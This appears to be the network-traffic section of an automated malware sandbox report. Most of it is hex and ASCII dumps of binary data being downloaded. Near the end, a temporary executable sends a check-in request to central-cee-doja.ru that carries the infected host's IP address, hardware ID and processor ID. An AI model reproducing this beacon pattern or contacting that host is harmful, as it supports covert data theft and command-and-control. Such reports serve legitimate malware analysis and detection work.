2023-11-18 09:02:40 UTC	8420	IN	Data Raw: 45 53 44 42 e3 aa 79 c9 a5 d4 4c 41 bd a5 89 42 8a 89 82 b8 80 48 02 02 32 ec 04 03 1a 6e 93 09 99 b9 76 53 29 bd 8a e5 96 59 81 5a 99 4a a2 e1 92 61 a2 e1 52 a9 61 92 62 59 2a ee a6 79 3f 87 e1 1c be df 99 39 33 73 fd dd 6e 3f fe f0 d5 eb dd e7 79 e6 3c eb 9c 39 33 73 26 b8 2f ed b1 3e 90 80 5e b4 c7 02 21 27 fb b2 57 6d 90 10 96 49 87 dc 7e 96 66 5e 85 e8 58 66 29 a4 aa 3f cd 14 43 06 fa b1 b3 26 88 81 95 fa 16 f2 a4 3f cd 5c 86 14 b0 8c 78 d3 c3 ce 83 d9 33 35 24 74 b0 e9 ae 6e ec 8d ba cf 15 34 16 84 10 8b a3 6c b0 63 e5 7a da b1 ab 87 f8 da fe 46 fc 35 3b 46 f9 1d 2d fb 76 8c e9 20 0b 4f a3 19 5b a5 96 2a 8c 72 28 32 3f 0d 96 46 19 bb 5f ba 78 6b f5 87 03 e9 b8 47 23 f3 f3 10 76 26 0c f1 7d 9e 66 de 0c 21 6d af 93 8f 20 db 59 e6 cb 10 e3 7d b9 c9 f5 Data Ascii: ESDByLABH2nvS)YZJaRabYy?93sn?y<93s&/>^!'WmI~f^Xf)?C&?\x35$tn4lczF5;F-v O[r(2?F_xkG#v&}f!m Y}
2023-11-18 09:02:40 UTC	8436	IN	Data Raw: 47 45 cc 88 4f b0 a2 16 ac 9d 83 2b 6c 4b 22 5a 3a 71 90 26 36 8a ae 83 a4 b0 b7 bc 4a 20 13 d8 1d 48 2d 24 88 ad 99 b7 40 36 b2 51 bd eb 57 b6 55 3e 2d 65 1f 48 38 db 83 1e 0f 89 66 31 ef 40 ce b0 3b c6 14 88 85 c5 a4 43 8a e7 b2 b7 7d 20 17 bf a0 29 1f 85 b8 b1 e7 9d 2a 88 37 7b 1a bd 0c f9 ec 35 2a ca 09 f5 1f 5a d3 de 90 35 bb 69 ca 7e 27 6c eb 5a e4 7a 3f a1 ef 3f 46 48 05 7b cb 22 15 52 f2 0a 95 4f 20 4b d8 db 3e 7b 20 45 ec ec 1c 83 9c 3e 4d 63 2e 42 ae 44 50 b9 0b 59 c1 de f1 e8 71 12 33 2c 7b 4a 1a 74 52 5f c2 11 90 00 76 4e 83 4e da 66 4e 6d f6 9c 0e 09 65 fd f0 5d 91 4e 2a a4 ac 89 d5 0b 52 c2 d6 5b 0a 21 b3 c7 b0 9d 47 88 6b 37 76 2e 20 37 58 4d 1f 42 16 b0 59 b8 0f ae fe 60 d6 3e 83 2b f5 e5 99 08 49 67 7d 7e 0a e4 14 7b 76 30 43 fe d9 97 bd Data Ascii: GEO+lK"Z:q&6J H-$@6QWU>-eH8f1@;C} )7{5Z5i~'lZz??FH{"RO K>{ E>Mc.BDPYq3,{JtR_vNNfNme]N*R[!Gk7v. 7XMBY`>+Ig}~{v0C
2023-11-18 09:02:40 UTC	8452	IN	Data Raw: 90 10 52 18 6d 03 da 6a b4 75 c7 52 52 60 39 b2 50 d0 cf 16 27 10 de d2 8c 83 61 19 ca 98 7a b0 2f a3 a4 ee 95 dd 00 55 1d 82 06 ec 98 f7 ca 32 c6 d5 18 3b 8d 31 3d 18 b2 9b 3f b4 c5 b4 36 7a f5 e6 ac 0a 33 8a f6 cb 74 65 8a d4 b5 8c 78 ab 2e f4 aa d5 76 9b da 50 a0 b6 da 7d fd 6d ec 98 c9 ad cf 50 8f c1 7d cb f1 5d 8a ef 32 7c ab b4 be d8 a0 d6 28 17 6b bd b1 28 5a b7 d6 c7 5a 59 8b c4 0e a3 2d 01 4e b1 86 34 80 d6 8d b6 60 34 89 9e 8c 9e 1d 6d 09 5a c7 68 44 73 ca 5a 34 ae 6b 51 e9 95 de 13 ba f4 4a d8 dd 2b f9 dd a8 b5 b4 7e ed 24 fb a2 e8 d0 f2 ed f0 2a 6d 30 7e 46 7a 76 29 e6 12 c7 13 31 03 16 ad 08 9f 48 26 62 a8 2d 69 2f e2 f8 6a 47 b5 3f 9e 18 03 c2 91 73 fd 79 a0 0f 6b 63 c7 a3 09 cd c0 c7 b2 59 29 9c a0 70 6a 47 0c 8a c3 b9 14 83 71 5d 7a ae 86 Data Ascii: RmjuRR`9P'az/U2;1=?6z3tex.vP}mP}]2\|(k(ZZY-N4`4mZhDsZ4kQJ+~$*m0~Fzv)1H&b-i/jG?sykcY)pjGq]z
2023-11-18 09:02:40 UTC	8468	IN	Data Raw: 53 71 a7 ac 1d a6 2c 10 46 9d 2e 74 64 90 cc 6f 76 12 51 69 27 c4 b8 dd b3 5a 3a 12 58 a2 4f 30 37 08 97 35 17 c3 4a f4 31 f0 4c e5 ad 77 40 8d df 09 f2 5a 4a e0 05 09 33 61 58 f0 2f 6e 9b 69 d2 eb f9 17 9d 9a dd c0 09 12 c8 0b 92 47 4a 2e b9 20 5b bd cd 3c 1a 10 65 4c 41 0b 05 eb 4e 05 b3 40 c2 ee b5 93 a3 cc 35 e2 f9 59 ec 9c 97 d8 f2 0e ca d4 c3 13 1f 86 5b 96 2f b6 f3 9b 0e 2b 0e b7 ae a2 8b 62 f3 1a e1 aa e6 52 58 0d d4 ac 06 25 9b 33 62 a5 cc bf c7 35 0f 04 ea e1 89 87 c7 c8 5b 1f 41 2f 9d 03 fc e6 21 4d 4f 18 9e 15 ea e0 ad 7f e6 e8 2e cf 9a 0e ba 2f 62 f9 50 41 ed 28 62 a8 bf f8 a8 1d 74 1b 59 aa 1a e3 07 06 a9 06 40 44 78 34 4b 56 0b f3 77 dd 2b d9 31 de b5 e4 dc 1d 5d 46 c4 85 c1 72 1d 4f b0 c0 63 e4 6d 3f 20 ab 25 f7 07 f4 3e 0f c3 e1 c0 ea fe Data Ascii: Sq,F.tdovQi'Z:XO075J1Lw@ZJ3aX/niGJ. [<eLAN@5Y[/+bRX%3b5[A/!MO./bPA(btY@Dx4KVw+1]FrOcm? %>
2023-11-18 09:02:40 UTC	8484	IN	Data Raw: ba c0 6f a5 ec 9b ac 57 7c f1 fc a2 84 e7 19 c1 28 73 91 f9 9c d2 b3 65 95 3e 4d 21 1e 9c 32 4f ec cb d4 67 06 99 f5 40 76 5b d4 62 9e 8c 9e b6 28 7d e9 d1 8e 67 98 21 cb 75 b8 19 d8 0e 38 d8 8d 21 f0 ab 15 21 3f b8 42 b6 d9 1d 4d 8a 96 21 58 f7 59 90 fa 3b 2d 47 1b 52 13 78 eb 4b 80 a9 15 33 52 e3 cc 85 18 7b 4d b1 3e 16 53 ac 21 29 e0 03 f7 df 87 0a 78 2b de 15 6b 39 ce b7 0c 69 57 24 f0 9b f6 79 f4 2f 1e a8 0c af 4d 4d e3 6d a3 70 41 2a 4b 3a 49 4c da bd 63 45 70 df b6 c5 a6 f7 5d 77 e9 e4 eb 23 47 93 92 e0 b9 65 b6 c7 f1 b8 c2 a4 b1 b4 2b 5a 9e 42 7d 02 bc 20 40 fa 26 3b b9 c8 3c 58 33 9a 90 a0 61 61 ad b0 1c e0 84 0e 98 3b 5e f8 02 ed 8f f1 4c 3a bd 47 5a 09 49 85 6d 96 e3 ab bb 8e a3 1e e7 33 6b 5b f3 e9 aa b5 de fc cf 2b cc fb 60 0e e2 ad bf a7 fa Data Ascii: oW\|(se>M!2Og@v[b(}g!u8!!?BM!XY;-GRxK3R{M>S!)x+k9iW$y/MMmpA*K:ILcEp]w#Ge+ZB} @&;<X3aa;^L:GZIm3k[+`
2023-11-18 09:02:40 UTC	8500	IN	Data Raw: 55 7a 57 cf c4 25 1a 39 b8 38 17 16 3e e8 d0 02 70 c3 00 99 08 f1 ad 34 1b ae 13 67 87 d2 28 74 4b c2 87 18 be 13 1a ed f2 01 e1 6e 08 d5 11 55 56 78 a3 95 b1 68 62 e5 b2 4d a6 86 42 54 09 23 cd 2c f3 c9 1e a1 c5 c5 05 12 74 8f 5f d2 cc a2 7c 51 86 98 b8 df 3f a5 1c 38 3a cc 37 21 23 93 8c fa 9a 1a b1 c3 c6 86 f9 e1 4c aa f0 83 d7 80 4c e3 26 be e9 07 92 c8 ef 76 ed 88 00 48 62 f1 83 c8 e8 f9 a4 1f 88 75 d7 98 70 ff 96 49 55 bb 37 5c 8e f2 a2 39 45 b8 09 be a0 30 57 5c 77 c6 3c 18 14 b5 df 37 02 a2 1b 6f 56 aa 2f 07 c4 c4 e4 06 c0 e7 ca c1 f3 03 c0 f3 ea 1b 96 55 36 7a 63 e4 8d 58 40 91 37 42 7e 60 09 d5 35 95 5e 78 41 00 7c fe 13 5e e8 43 01 50 94 ba 9f 10 d7 fd 31 85 01 f0 a2 fa 2a 13 cc 84 a6 ff 0f 7b d7 1e dd 46 75 e6 ef 95 46 f2 63 24 5b b6 e4 47 6c Data Ascii: UzW%98>p4g(tKnUVxhbMBT#,t_\|Q?8:7!#LL&vHbupIU7\9E0W\w<7oV/U6zcX@7B~`5^xA\|^CP1*{FuFc$[Gl
2023-11-18 09:02:40 UTC	8516	IN	Data Raw: 8a ad 10 02 bf ab fe 75 d2 98 a7 7e 81 59 a8 7f 83 78 82 f8 91 4e a1 eb df 24 4d 78 a9 10 ec df 3b 57 c8 15 0b 50 ff 5f 44 c3 08 35 f4 66 4b 78 6e 15 96 f0 5c d7 66 4f 89 6e b5 52 22 34 75 72 4a c4 96 f0 ac 20 04 cf b4 ba 06 31 d1 53 ed 00 5d 73 68 f4 e4 39 27 ea 3a 8c 47 21 7e e4 0a cd 51 d1 4f da 70 bb a8 d0 61 2a 05 f8 e7 95 c7 02 cd 79 da 5a c3 0e 1a 41 68 7e 0b 90 b3 49 33 a6 34 34 df 0d e4 5c fe 19 56 5e 4a bd 22 38 a6 34 bc 76 0a 5e 97 1b 5e cf 06 f8 87 2f 50 af 55 f3 40 f6 12 df 67 e9 e9 4f b8 00 fe c9 85 0e 3d c1 e6 bc 0f 37 78 62 d1 50 8f 71 d2 c6 83 d6 53 25 48 3f 3c 6c 28 33 ba b2 fa 12 7a 7d 3f 36 ac 9f d3 ad 6b 2e e8 75 e7 f1 9a 61 ad 99 72 dd cc 96 20 6d 5f bb b4 28 d7 17 75 ca f5 ca 6a 45 b9 14 e5 52 94 4b 51 2e 45 b9 14 e5 52 94 4b 51 2e Data Ascii: u~YxN$Mx;WP_D5fKxn\fOnR"4urJ 1S]sh9':G!~QOpa*yZAh~I344\V^J"84v^^/PU@gO=7xbPqS%H?<l(3z}?6k.uar m_(ujERKQ.ERKQ.
2023-11-18 09:02:40 UTC	8532	IN	Data Raw: 90 23 06 86 1c 31 61 c8 91 64 18 72 c4 84 21 47 34 0c 49 fd 60 0e 81 21 27 85 cf 3e 0c 19 76 87 5d 98 c8 66 f5 5a 18 d2 c2 90 16 86 b4 30 a4 85 21 2d 0c 69 61 48 0b 43 5a 18 d2 c2 90 16 86 b4 30 a4 85 21 2d 0c 69 61 48 0b 43 9e f5 18 72 40 7f 2b da 67 17 5c 4b 47 23 7c a7 87 20 64 37 65 64 ed d2 20 64 80 54 f1 2e ed e7 8c 54 a0 03 c5 d9 d5 c4 ff 2a ec ae a2 6a 78 6a e6 62 27 84 54 34 1d e2 47 30 36 91 38 17 a2 7f 1e 76 3e 48 c5 54 be 84 7e be 58 b2 9c 0e 41 62 84 1b 70 18 3d 1f 81 91 4a 2f a7 c8 30 96 93 b8 86 e0 20 8c 27 48 dc 08 f1 f4 02 c6 1e 40 2a bd 0d 62 55 23 da 8c 54 fa 20 c4 94 26 dc 9a 48 a5 8f 42 6c 85 f1 3d 12 cf d0 fb d6 30 1e 24 f1 22 9d b3 10 e7 20 95 1c 24 1c f9 0e 0e c7 c2 ea 7b cd a5 ef 42 7c 82 ac 8f 91 4a 4f 40 a4 36 33 a6 34 ab 3c b0 Data Ascii: #1adr!G4I`!'>v]fZ0!-iaHCZ0!-iaHCr@+g\KG#\| d7ed dT.Tjxjb'T4G068v>HT~XAbp=J/0 'H@bU#T &HBl=0$" ${B\|JO@634<
2023-11-18 09:02:40 UTC	8548	IN	Data Raw: 63 8c 46 dd 81 72 22 9f cf 60 4f ed 75 1f e4 39 34 01 b4 b3 c1 7c ce 8a c9 43 51 77 42 cc 1c a4 55 c7 18 4f 88 27 92 09 fb bc 26 bf 0c 59 3f 09 84 85 36 d2 49 e9 54 ba 94 58 b2 1c 3c c4 42 b9 45 20 45 a2 1e b1 92 75 6c 10 5f c4 a3 93 6c 3c 9d a3 36 35 ce 53 17 33 f9 f9 78 86 06 e8 a0 8e 94 04 aa 82 da 26 84 a1 83 8a d0 ac f8 74 79 59 22 81 a8 17 c9 51 51 8c e7 d0 51 cf c7 13 27 31 1a 83 2c ad 14 97 4e 92 c0 24 4f 71 a0 90 09 97 d2 0b 90 67 b1 64 e0 80 a0 a9 02 f4 66 39 07 9a 60 09 05 09 4c 09 73 9b 48 a7 4e 63 47 24 af 40 70 ba 07 35 2e 15 b2 9d 89 39 c8 93 52 39 dc 73 cb 96 f2 17 f2 a0 59 18 f5 d2 72 89 65 b9 87 2c 6e a1 90 e5 42 30 36 3b d6 e9 d9 f4 a4 17 25 99 c7 89 11 99 07 39 66 37 f0 13 28 87 bc 2a 93 ca c9 78 29 6e 31 66 bc 2a 11 18 87 1d 0c 30 be Data Ascii: cFr"`Ou94\|CQwBUO'&Y?6ITX<BE Eul_l<65S3x&tyY"QQQ'1,N$Oqgdf9`LsHNcG$@p5.9R9sYre,nB06;%9f7(x)n1f0
2023-11-18 09:02:40 UTC	8556	IN	Data Raw: 6e f0 f2 ef e2 f1 0e c9 ae 5a b1 8b 27 2c e4 97 dc 79 77 ed e7 bb 78 9f ef e2 7d be 8b f7 a7 ec e2 f1 9b 5d 75 97 54 d9 76 f1 f8 2d 56 e8 8c bb 78 fc 36 57 e5 3b 7f 74 17 8f 7f 43 4a 95 d0 f0 dd b6 d6 1c 1f dc 6b 73 77 f1 f8 1d ae 7a 92 50 f5 94 d8 b4 d2 63 74 4c f0 d6 32 e1 78 f7 5a 19 99 13 09 a5 c4 80 90 38 f3 de 5f 8d be 78 20 bd 8f 56 87 4b 50 b4 8a 95 6e c5 91 aa 46 5f 36 b1 62 56 33 8e d8 9a e9 a9 b4 2e 77 38 80 ab cd fc 0f 58 64 d9 fc c2 cc 7e f9 6b 98 6a eb 6a b1 bb 53 7b 65 09 aa b2 ae e8 15 f1 3e e3 c4 c2 c2 c4 11 50 d7 af 25 69 0e 25 c5 75 00 14 d6 92 4e 38 9d ed c6 78 dd d4 15 13 0b d3 fa 34 39 ec 55 f5 cf 39 61 65 07 e4 2b e8 ea 09 d7 8b f5 b4 57 e0 0b 05 f4 a9 f4 01 2a e8 56 d7 53 08 a9 b5 3f a3 82 6e 5b 73 79 83 d8 c9 28 c3 54 f5 aa ba 59 Data Ascii: nZ',ywx}]uTv-Vx6W;tCJkswzPctL2xZ8_x VKPnF_6bV3.w8Xd~kjjS{e>P%i%uN8x49U9ae+W*VS?n[sy(TY
2023-11-18 09:02:40 UTC	8572	IN	Data Raw: ee d3 9c 0e 77 3e e6 7b 1c e3 f1 ea 81 d0 e0 30 6e 5a 31 9d 28 b7 70 8e c3 cd 33 a1 33 d3 a8 1a e0 ec 5b 45 e1 02 5f f7 c1 9d 17 37 69 83 a0 e7 fd 22 0a 67 90 9d aa 08 26 ca f7 45 80 06 9d ad fb d5 80 86 ff f0 3a c7 33 35 22 ca 3f 95 82 41 89 9a 17 aa 74 9b 08 72 69 81 1d ba d3 eb 70 ab 01 27 75 d9 c0 52 5d de 31 8f 1e d4 46 55 6f 28 48 94 db 45 bc ba 4b 75 86 e8 1e a0 5f bd 38 a4 b1 6d a1 8b 43 6a 20 98 cd 70 87 98 61 a7 e6 52 bd 42 15 ef 2c 64 16 29 f3 ae 42 14 fe db 3d ee f0 38 d5 2c ea 40 11 94 cb e1 63 ea 53 fd 4e b0 62 f4 ba c1 68 5b d0 e1 dd 85 68 97 36 9a 95 76 4f 29 69 46 15 89 72 6f 8e 39 79 3d 1a 6e 9a 32 73 81 79 5f b9 2f 47 bb ea 4e cd c9 73 c3 af 5b 73 8e 73 c9 83 7e 6d 78 24 e8 51 03 60 5c f7 97 97 05 2b 2b 66 7b a0 b0 be ce 90 df 8f 8d 36 Data Ascii: w>{0nZ1(p33[E_7i"g&E:35"?Atrip'uR]1FUo(HEKu_8mCj paRB,d)B=8,@cSNbh[h6vO)iFro9y=n2sy_/GNs[ss~mx$Q`\++f{6
2023-11-18 09:02:40 UTC	8588	IN	Data Raw: 43 37 53 d2 5d f0 0b d0 9c 5e 78 ac dd 40 a6 4e 84 35 04 2b ed d7 f9 71 b8 1c 27 e1 0c 4f e0 59 de 04 31 5b 01 b1 db e8 85 0e 23 4d 8f 82 6d 07 d8 8e 66 7a ee 67 f4 4c 87 f2 11 5f 40 9a ba 8d b8 2f a4 b8 d7 c0 76 00 6c c5 e2 96 d1 b1 42 07 e2 f9 65 78 1b 9c 47 16 f3 15 d8 03 06 70 ae 21 1d 60 e8 c5 4e 18 3a 92 d8 2d a4 7e 6a af e6 5b e0 f1 8a 1b bd 27 7a 6e 73 6a cd f4 96 2e f1 e5 f6 84 21 44 6e 92 3e 43 7a 36 ef 03 1c 6e f4 de 9a e6 f5 f0 13 37 ba a5 c0 ec e8 c2 b5 a9 ce 0d 58 cf 44 6e 93 fa 41 d5 cd d7 01 10 b7 da d9 e5 e7 2d e3 b7 02 b1 e4 fc 0d 43 03 99 b6 13 20 b8 d5 8e d6 7a 9c df b2 04 ae 3c 11 fb d8 af 69 3f f2 7e 23 fe e2 34 73 e7 0f a0 e2 c1 9a f6 ae 35 2b 3a 5b 4f ab d8 41 37 3c f1 92 f0 db c4 89 b9 59 6b 8e 04 3e c5 d2 16 66 d9 01 6d 79 05 2f Data Ascii: C7S]^x@N5+q'OY1[#MmfzgL_@/vlBexGp!`N:-~j['znsj.!Dn>Cz6n7XDnA-C z<i?~#4s5+:[OA7<Yk>fmy/
2023-11-18 09:02:40 UTC	8604	IN	Data Raw: 05 6e 6c 2c 65 b1 b1 94 c7 c6 52 0e 1b 4b 59 6c 2c e5 b1 b1 94 c6 c6 52 1e 1b 0b 5c d8 58 ea c0 c6 52 3b 36 96 3a b1 b1 d4 85 8d a5 0e 6c 2c b5 62 63 a9 03 1b 4b ed d8 58 6a c7 c6 52 2f 6c 2c f5 c7 c6 52 3f 6c 2c e5 b1 b1 d4 86 8d a5 16 6c 2c e5 b1 b1 d4 8a 8d a5 36 6c 2c b5 60 63 29 8b 8d a5 56 6c 2c b5 60 63 29 8f 8d a5 4e 6c 2c e5 b1 b1 d4 86 8d 01 8b 8d 01 8f 8d 01 89 8d 81 0b 1b 03 37 36 06 3c 36 06 36 6c 0c 2c d8 18 d8 b0 31 b0 61 63 e0 c0 c6 c0 85 8d 01 8b 8d 81 81 8d 01 8f 8d 01 87 8d 81 03 1b 03 16 1b 03 1e 1b 03 2b 36 06 4e 6c 0c 1c d8 18 b8 b0 31 20 b1 31 a0 b1 31 a0 b1 31 b0 63 63 e0 c2 c6 c0 8d 8d 81 1d 1b 03 17 36 06 6e 6c 0c ba c0 c6 c0 8a 8d 81 1b 1b 03 3b 36 06 6e 6c 0c 2a 5e d8 58 5a 71 62 63 a9 27 36 96 7a 61 63 e0 85 8d 81 27 36 06 be Data Ascii: nl,eRKYl,R\XR;6:l,bcKXjR/l,R?l,l,6l,`c)Vl,`c)Nl,76<66l,1ac+6Nl1 111cc6nl;6nl*^XZqbc'6zac'6
2023-11-18 09:02:40 UTC	8620	IN	Data Raw: a0 33 25 46 0d 99 b6 a8 51 3c 8e 9e 68 5d 88 6b a0 ac 4e 5c 09 84 37 ef e3 02 5c b2 e7 80 4c 8b 86 d9 19 2e e8 6a 7d bc 21 aa 53 43 0b 05 b1 b1 5d fd 81 90 12 da ad af a6 6a f4 dc df d7 0e 46 73 c9 94 a0 60 73 9c 42 9c 9d 6b 74 1b f5 78 6e f9 17 86 9b 3a 3d 8b 46 af 0e d4 78 d0 12 9c fa 28 44 06 ca b6 5d 7d 5c 6b b9 01 3a 75 4f 8d 71 9d 0a 0d de 0b 05 76 2f a5 dc 4b 4c bc d7 89 a2 00 35 1b 13 43 45 2d 31 18 28 96 59 be 62 b3 c0 89 31 4a a7 9b a5 77 38 a0 1b a4 be d2 90 9d 6a f1 0c 38 70 36 e3 11 01 6d f1 75 09 a5 88 22 61 3a 5b 17 5a 3c 94 68 6d 0a 46 39 85 37 88 29 22 02 9d 4a dc 88 f3 ed 38 d5 37 25 48 24 f8 09 9a 58 3f 85 e6 6e 0a e2 d0 42 53 54 5c 9f 1b 01 45 ff 14 ab e3 26 d4 70 93 38 3c b0 1d 7e 93 5b 0f 2a 2a b0 98 78 bc 58 44 00 29 ba 10 8d 5c 48 Data Ascii: 3%FQ<h]kN\7\L.j}!SC]jFs`sBktxn:=Fx(D]}\k:uOqv/KL5CE-1(Yb1Jw8j8p6mu"a:[Z<hmF97)"J87%H$X?nBST\E&p8<~[**xXD)\H
2023-11-18 09:02:40 UTC	8636	IN	Data Raw: dd 9d e6 34 47 01 7f e9 32 34 bf 09 98 79 a0 79 0b a3 19 a5 34 0d f1 8c e6 6b d8 79 fb cc 69 6e 83 bc 45 c4 54 c9 6a 7d 81 9e 01 f5 63 2e b0 23 5c db a0 96 72 83 3a 26 c8 a4 88 f5 04 a0 02 e7 3e 6b de 7b e0 61 a4 2a cf 7b af 0b 75 d8 82 f7 c7 00 ef b5 a0 89 63 e4 0c 3c 1c 07 9a 7b 85 12 9b dc ef 2a 30 b4 8c 87 12 fe ed 93 e4 b4 c8 f4 04 ff 08 40 95 45 7d a8 3f d5 a0 c4 b3 55 3a 7b 03 0d e9 61 ea 66 2c 1f 4e 3b 02 e5 fc 16 b4 d1 4e 8c 02 66 01 68 7f bd c0 e6 87 d0 e6 87 d0 e6 c3 20 19 03 0b 1f 2a b2 f0 b4 ff 0d da 16 98 90 be 24 4e da 4f 13 aa 07 40 7b 9b 45 fd c8 fb 25 c0 8c af 93 d5 2d ac 7f fa 70 8c 99 ea 7f 19 f4 b9 05 3d 1c 9b cd 80 99 01 7a 2d 3a 59 65 f8 d8 6c 71 0b 96 f2 1a 87 b2 bb 2d e8 23 e6 59 8c d6 5c 2f ab 55 16 98 d7 00 e3 5f cf ec 99 19 66 Data Ascii: 4G24yy4kyinETj}c.#\r:&>k{a{uc<{0@E}?U:{af,N;Nfh *$NO@{E%-p=z-:Yelq-#Y\/U_f
2023-11-18 09:02:40 UTC	8652	IN	Data Raw: 98 fa eb f2 80 75 06 1f 93 07 6c 90 71 68 b0 78 4d be c1 ca 25 59 0a da 60 13 d0 16 9b 80 36 d9 04 b4 cd 26 a0 8d 36 01 6d b5 09 68 b3 43 46 08 36 8b 7b c4 ad 04 16 90 3e a2 0d 5b 43 7e 9a 3a 2f 8d b3 a3 52 a1 34 35 5e 1a c7 a3 12 70 28 99 4c 6b 79 5f 4b 9f 01 87 88 1c 0e c9 2a 3e c6 c3 eb 0c ce 65 d7 7b 65 d7 87 b7 55 c9 42 63 2a 16 8b c5 e3 7d 1c cd fb 3f ff 52 ed 91 ec bb b3 31 87 73 ab 47 35 80 3b b5 af 4b 48 e0 27 84 d4 c8 6a 03 38 56 ec 00 c0 cb 85 0e 98 4d 49 86 d1 38 85 4a 4b 60 10 21 ff 28 4f 9e 00 6f d2 88 e5 84 3c 5f 2a 81 1e 42 b6 0f 90 00 10 fc 65 10 48 7f 7f 78 1e 81 5d 1a bb 87 90 a1 e5 12 00 32 47 9c 71 00 8f ae 90 88 36 42 6e d4 00 90 7f 96 2d 0d e0 0e 8d f8 94 90 bf af 94 00 16 96 a5 1a 58 45 c8 af 35 30 82 04 ee 9c 6a 09 00 b9 58 b6 e8 Data Ascii: ulqhxM%Y`6&6mhCF6{>[C~:/R45^p(Lky_K>e{eUBc}?R1sG5;KH'j8VMI8JK`!(Oo<_*BeHx]2Gq6Bn-XE50jX
2023-11-18 09:02:40 UTC	8668	IN	Data Raw: 8b b6 e6 45 5b 73 db f5 9a 4a 6e e1 3f fd 66 f1 19 b3 ac fc a2 e7 b8 3d 6a fa 7b ec 45 fa 02 61 7e 63 09 5f c4 e3 ea 0e b3 2b 52 6b 78 85 89 9f 5b 74 fc 3c 9f e3 ea f9 06 6f 0a e7 9b b6 e4 ae 26 09 fe 45 55 f2 79 6f 3c 92 34 b3 ce 59 21 33 38 86 be 56 c7 d0 33 b8 41 e8 88 f8 5b a7 da 88 78 a5 2a e8 77 99 84 04 d8 ef 8a 6c 42 82 55 c4 17 86 bb 38 a3 c1 48 aa 0c 9c 5c 46 8c 4f 15 19 3e 35 de 2f b4 d9 a1 69 13 17 5f 6b b2 48 80 0c 11 1b d4 1f 96 2d b3 b4 38 93 48 8c a7 44 3f 18 4a 79 15 6c e3 4e a3 8d 17 1f a9 4e 1f 60 aa 44 d7 40 2e 21 fa 5c 05 96 31 fb 46 d6 56 7f 0d 64 15 ec 12 05 55 03 11 8d 9c af 03 25 9c 8e 0a 5e 46 03 35 c0 46 72 b9 7f 1e 58 c9 ce e0 b4 5d ca bc 44 f9 e1 f2 12 0a 0a db 1a 4d 60 bc 9c 5b 56 35 96 06 39 74 69 1f 51 ba ed 8a 32 f9 7c 45 Data Ascii: E[sJn?f=j{Ea~c_+Rkx[t<o&EUyo<4Y!38V3A[x*wlBU8H\FO>5/i_kH-8HD?JylNN`D@.!\1FVdU%^F5FrX]DM`[V59tiQ2\|E
2023-11-18 09:02:40 UTC	8684	IN	Data Raw: bd 4b e0 d5 48 e0 95 95 ac e6 75 49 c1 6b 3b ab bc 02 02 af 02 c1 6b b1 ec ab 93 db af 0d 84 35 0c f9 07 80 e9 21 74 6d cf f0 85 ea ef 9b 0e 89 3e ff 65 7c 8c 46 e0 7e d2 0e dc c7 a0 6d 5c 33 81 e9 dc 64 f5 a9 34 69 5d 14 3b 41 f1 3e 24 81 69 d3 15 64 5a 4f 60 9a 74 04 98 fe 1a 8d d3 27 ef 56 33 3d 38 09 98 3e 86 8f e3 08 4c d3 8b 81 e9 55 28 d3 56 02 d3 5a 02 d3 11 0a a6 07 78 5e 9d 4f c8 ab f3 81 69 53 d4 99 6e 26 30 7d ed 34 30 7d 19 8d d3 f3 8b d4 73 29 b7 5f 0f 4c 7f 8b 8f f5 08 4c c7 2e 05 a6 4e 94 e9 29 02 d3 9d c9 ea 93 08 66 28 98 f2 33 b6 5b 08 4c 5b 04 d3 9a a8 8f 1d b6 11 c6 0e f3 2e 01 d3 37 d1 38 5d b0 44 cd f4 d2 64 60 fa b0 86 8e 07 ad 84 6f 10 4a 80 e9 cd 28 d3 4b 04 a6 ed c9 fa dd 75 90 35 42 0a a6 27 f8 7c cb 5d 84 f9 96 bb 80 e9 e0 a8 Data Ascii: KHuIk;k5!tm>e\|F~m\3d4i];A>$idZO`t'V3=8>LU(VZx^OiSn&0}40}s)_LL.N)f(3[L[.78]Dd`oJ(Ku5B'\|]

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
80	192.168.2.4	49857	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:39 UTC	10707	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:40 UTC	10707	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=C26QTccwk9I9nnC7hLcz6DhvkMuOrnbo4pRonlSo%2FY0KKhHcJpEtr8G%2Fh5oGaMx%2FRSVCCKJn8RXlbEWGTQOTGndKvm%2BX9f6JCnHfnGkq6rOpkyRNwOiqja5gDer8K6nUSS4exYk%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0aa36cd6c37b-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:40 UTC	10708	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:40 UTC	10708	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
80	104.21.89.193	443	192.168.2.4	49857	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:39 UTC	10707	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:40 UTC	10707	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=C26QTccwk9I9nnC7hLcz6DhvkMuOrnbo4pRonlSo%2FY0KKhHcJpEtr8G%2Fh5oGaMx%2FRSVCCKJn8RXlbEWGTQOTGndKvm%2BX9f6JCnHfnGkq6rOpkyRNwOiqja5gDer8K6nUSS4exYk%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0aa36cd6c37b-SEA alt-svc: h3=":443"; ma=86400
